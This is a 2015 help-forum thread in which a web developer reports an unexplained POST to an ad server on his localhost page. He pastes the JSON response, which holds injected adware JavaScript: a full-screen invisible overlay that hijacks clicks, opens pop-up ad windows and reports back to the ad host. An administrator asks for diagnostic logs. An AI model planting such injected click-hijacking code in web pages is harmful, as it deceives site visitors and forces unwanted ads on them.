Welcome to MalwareRemoval.com,
What if we told you that you could get malware removal help from experts, and that it was 100% free? MalwareRemoval.com provides free support for people with infected computers. Our help, and the tools we use are always 100% free. No hidden catch. We simply enjoy helping others. You enjoy a clean, safe computer.

Malware Removal Instructions

unknown POST api.adsrun.net/post" on localhost?

MalwareRemoval.com provides free support for people with infected computers. Using plain language that anyone can understand, our community of volunteer experts will walk you through each step.

unknown POST api.adsrun.net/post" on localhost?

Unread postby ershadow786 » November 10th, 2015, 3:15 am

i have been working on project web development releated.I have been looking some thing in firebug there i notice that there is one unknown POST call is triggered don't know from where and POST call triggered is "POST http://api.adsrun.net/post" when i checked JSON response there is key called ad and whose object is Object { url="http://www.newpoptab.com...2cbae821bd2f3056f84047d"} yesterday it's was "tradeadexchange.com/something" after some google i found these were ad ware malware programs.I used antivirus but none worked.SO plz help me in fixing this problem.This is worrying me?

I have registration form when i reload page i see in firebug following "POST http://api.adsrun.net/post"

Response Header
Cache-Control
no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection
keep-alive
Content-Type
application/json
Date
Mon, 09 Nov 2015 13:25:43 GMT
Expires
Thu, 19 Nov 1981 08:52:00 GMT
Pragma
no-cache
Server
nginx/1.9.4
Set-Cookie
PHPSESSID=a0f52694494daab764d719b907baff6b; expires=Sat, 07-Nov-2020 13:25:43 GMT; Max-Age=157680000
; path=/
Transfer-Encoding
chunked
access-control-allow-cred...
true
access-control-allow-head...
Content-Type
access-control-allow-orig...
http://localhost
p3p
CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"


RESPONSE is something like this

{"eval":"\nvar ad = response.ad;\nvar ad_token = response.ad_token;\nfunction postAction(xlog, cb) {
\n var params = {\"ad_id\":14,\"show_id\":27,\"user_id\":1573819,\"host\":\"localhost\",\"time\":1447075543
,\"hash\":\"6dd0fd2392c7a0cc9800ccfcea9143ed\"};\n params.postActionParams = xlog;\n ajax(\"http:\
/\/api.adsrun.net\/postAction\", params, cb);\n}\nvar ontw = false;\r\nfunction oNT() {\r\n if (ontw
) return;\r\n else ontw = true;\r\n var b = window.open(ad.url, \"new\" + Math.floor(9999999 *
Math.random()) + 1);\r\n if (b) postAction(); \r\n\r\n\/\/ var e = navigator.userAgent.toLowerCase
(),o = -1 != e.indexOf(\"opera\"),g = -1 != e.indexOf(\"chrome\");\r\n\r\n \/\/ if (document.createEvent
&& (o || g)) {\r\n \/\/ if (false) {\r\n \/\/ var b = document.createElement(\"a\");\r\n
\/\/ b.href = ad.url;\r\n \/\/ b.target = \"_blank\";\r\n \/\/ var c = document.createEvent
(\"MouseEvents\");\r\n \/\/ c.initMouseEvent(\"click\", !0, !0, window, 1, 0, 0, 0, 0, !0, !1,
!1, !1, 1, null);\r\n \/\/ b.dispatchEvent(c);\r\n \/\/ postAction();\r\n \/\/ } \r\n
\/\/ else {\r\n \/\/ var b = window.open(\"about:blank\", \"win\" + Math.floor(9999999 * Math
.random()) + 1);\r\n \/\/ with(b) opener.window.focus(), b.location = ad.url, \"undefined\" !=
typeof window.mozPaintCount && window.open(\"about:blank\").close()\r\n \/\/ if (b) postAction
(); \r\n \/\/ }\r\n \r\n\r\n}\r\n\r\n\r\n\r\n var startTimeout = setTimeout(myStart, 100),divret
= null;\r\nif (\"function\" == typeof window.addEventListener) window.addEventListener(\"load\", function
() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n}, !1);\r\nelse try {\r\n window.attachEvent
(\"onload\", function() {\r\n clearInterval(startTimeout);\r\n myStart()\r\n })\r\n} catch
(D) {}\r\n\r\nfunction myStart() { \r\n\r\n var pdiv = document.createElement('div');\r\n
pdiv.style.position = \"fixed\";\r\n pdiv.style.zIndex = \"2147483647\";\r\n pdiv.style
.width = \"100%\";\r\n pdiv.style.height = \"100%\";\r\n pdiv.style.left = \"0px\";\r\n
pdiv.style.top = \"0px\";\r\n pdiv.onclick = function() {\r\n oNT();\r\n document
.body.removeChild(pdiv);\r\n }\r\n if (!divret) {divret=document.body.appendChild(pdiv);}\r
\n document.addEventListener ? document.addEventListener(\"mouseup\", oNT, !1) : document.attachEvent
(\"onmouseup\", oNT);\r\n \r\n}","ad":{"url":"http:\/\/www.adcash.com\/ad\/display.php?r=356017"
},"ad_token":"31f68d20ffc59b05601acfa0dc349e4b14"}

I am not sure this some malware type may be harmful??I have encountered this problem from 2 days looks strange to me and need your suggestions?

JSON :
var ad = response.ad;
var ad_token = response.ad_token;
function postAction(xlog, cb) {
var params = {"ad_id":14,"show_id":27,"user_id":1573819,"host":"localhost","time":1447075543,"hash":"6dd0fd2392c7a0cc9800ccfcea9143ed"};
params.postActionParams = xlog;
ajax("http://api.adsrun.net/postAction", params, cb);
}
var ontw = false;

function oNT() {

if (ontw) return;

else ontw = true;

var b = window.open(ad.url, "new" + Math.floor(9999999 * Math.random()) + 1);

if (b) postAction();



// var e = navigator.userAgent.toLowerCase(),o = -1 != e.indexOf("opera"),g = -1 != e.indexOf("chrome");



// if (document.createEvent && (o || g)) {

// if (false) {




eval

"\nvar ad = response.ad;\nv...", oNT);\r\n \r\n}\r\n}"
ad

Object { url="http://www.newpoptab.com...2cbae821bd2f3056f84047d"}
url

"http://www.newpoptab.com/watch?key=60fd53c3a2cbae821bd2f3056f84047d"
ad_token

"a5ab0c5715d280f28934d73acc4a5b1c3"

:x
ershadow786
Active Member
 
Posts: 1
Joined: November 10th, 2015, 3:04 am
Advertisement
Register to Remove

Re: unknown POST api.adsrun.net/post" on localhost?

Unread postby NonSuch » November 11th, 2015, 3:17 am

By posting just a description of your problems it is likely that your topic will be passed by and you will not receive the help you're looking for.

We need to know what's running on your computer so we can give you appropriate instructions.

May I draw your attention to THIS topic, which you should have read, and which tells you what we need you to post so that we can help you.

This topic will now be closed.

If you still need help, please start a new thread with:

  • FRST.txt
  • Addition.txt
  • Details of your problems.

If for any reason you can't run FRST, please let us know in your post.

User avatar
NonSuch
Administrator
Administrator
 
Posts: 28747
Joined: February 23rd, 2005, 7:08 am
Location: California


  • Similar Topics
    Replies
    Views
    Last post

Return to Infected? Virus, malware, adware, ransomware, oh my!



Who is online

Users browsing this forum: No registered users and 332 guests

Contact us:

Advertisements do not imply our endorsement of that product or service. Register to remove all ads. The forum is run by volunteers who donate their time and expertise. We make every attempt to ensure that the help and advice posted is accurate and will not cause harm to your computer. However, we do not guarantee that they are accurate and they are to be used at your own risk. All trademarks are the property of their respective owners.

Member site: UNITE Against Malware